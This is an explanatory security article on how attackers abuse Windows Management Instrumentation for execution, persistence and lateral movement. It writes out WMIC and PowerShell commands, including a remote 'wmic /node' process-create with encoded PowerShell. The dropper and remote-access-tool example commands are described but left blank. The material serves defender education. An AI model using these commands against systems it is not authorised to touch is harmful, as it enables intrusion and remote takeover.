WMI Code Execution
Windows Management Instrumentation (WMI) is a versatile and powerful administrative framework included in Windows operating systems, providing an interface for accessing and managing system information, configuring settings, and automating various administrative tasks. While these capabilities are invaluable for system administrators, they also present opportunities for cybercriminals to execute malicious code, establish persistence, and conduct a range of other malicious activities.
WMI Event Subscriptions
WMI event subscriptions consist of three primary components:
Event Filter: Defines the conditions under which the event should trigger.
Event Consumer: Specifies the actions to take when the event occurs.
Filter-Consumer Binding: Links the event filter to the consumer, ensuring that the specified actions are executed when the event is triggered.
Attackers exploit this functionality to create persistent backdoors and trigger malicious actions based on specific system events.
Examples of Malicious WMI Event Subscriptions
Triggering Malware Execution: Attackers set up an event subscription to execute malware when a specific application, such as a web browser or email client, is launched.
Data Exfiltration: An event subscription can be configured to exfiltrate data when certain files are accessed or modified.
Automated Attacks: Attackers can configure events to launch attacks when a user logs in or logs out, or in response to network connections or disconnections.
Process Execution via WMI
Attackers leverage WMI's capability to execute processes both locally and remotely to achieve various malicious objectives. This ability to execute arbitrary code on target systems can be used for initial compromise, lateral movement, maintaining persistence, and more.
WMIC.exe
WMIC.exe is the command-line interface for WMI, allowing users to perform WMI operations through a command prompt. Attackers often use WMIC.exe to run commands that can control local or remote systems. This tool provides a straightforward way for attackers to leverage WMI's powerful functionalities.
Examples of Malicious Use:
Reconnaissance: Attackers can run commands like
wmic process listto gather information about running processes on a system. This can help them understand what applications are in use and identify potential vulnerabilities or targets for further exploitation.Remote Code Execution: Commands such as
wmic /node:"target_ip" process call create "cmd.exe /c powershell -encodedcommand <encoded_command>"enable attackers to execute scripts on remote systems. This method allows attackers to spread their reach within a network, deploying payloads or commands without needing physical access to the target systems.System Configuration: Changing system settings or configurations, for example,
wmic service where (name='ServiceName') call startservice. This command can be used to start or stop services, modify their configurations, or even disable critical security services, thus compromising the system’s integrity and defenses.
PowerShell Cmdlets
PowerShell provides several cmdlets that interact with WMI, such as Invoke-WmiMethod, Get-WmiObject, and Set-WmiInstance. These cmdlets allow for extensive interaction with the WMI infrastructure, enabling a wide range of operations that can be exploited for malicious purposes.
Examples of Malicious Use:
Process Creation: Using Invoke-WmiMethod to create processes, e.g.,
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c calc.exe". This can be used to run any executable on the target system, including malware.Gathering Information: Using Get-WmiObject to query system information, e.g.,
Get-WmiObject -Class Win32_Processto list all running processes. Attackers use this to gather detailed information about the system’s state, installed software, and running services, which can inform their next steps.Modifying System State: Using Set-WmiInstance to change system configurations, such as modifying user account settings. This can include creating new administrative accounts, changing permissions, or altering configurations to facilitate further attacks.
Programmatic Interfaces
Languages such as C++ or .NET can interact directly with WMI, offering even more powerful and flexible ways to execute processes and perform other WMI operations. By embedding WMI functionality into custom malware, attackers can create sophisticated threats that are harder to detect and mitigate.
Examples of Malicious Use:
Custom Malware: Writing custom malware that uses WMI APIs to execute payloads or gather information, e.g., a C++ application using the IWbemServices interface to execute commands. This allows for precise control over the target system and can integrate WMI capabilities into broader malware functionality.
Advanced Persistence: Using .NET to create complex, stealthy backdoors that interact with WMI, e.g., embedding WMI queries and method calls within the .NET code to evade detection. Such backdoors can be designed to trigger under specific conditions, making them highly resilient and difficult to remove.
Malicious Process Execution
Deploying Payload Droppers
WMI can be used to drop additional malware onto the system. An attacker might use a command to execute a payload dropper that downloads and runs a secondary payload. This technique is particularly effective because it allows attackers to introduce new malicious components without direct interaction with the system’s file system, often evading traditional antivirus measures.
Example Command:
This command demonstrates how an attacker can use WMI to run a PowerShell command that downloads a malicious payload from a remote server and then executes it. This method is commonly used to install various types of malware, including ransomware, spyware, or additional loaders.
Executing Remote Administration Tools (RATs)
Attackers often deploy RATs to maintain control over compromised systems. WMI commands can be used to install and execute these tools remotely, providing persistent access and control over the infected systems.
Example Command:
This command starts a PowerShell process that downloads and executes a remote administration tool script directly from a malicious server. RATs allow attackers to perform a wide range of activities, from stealing data and capturing keystrokes to taking control of the system’s camera and microphone.
Last updated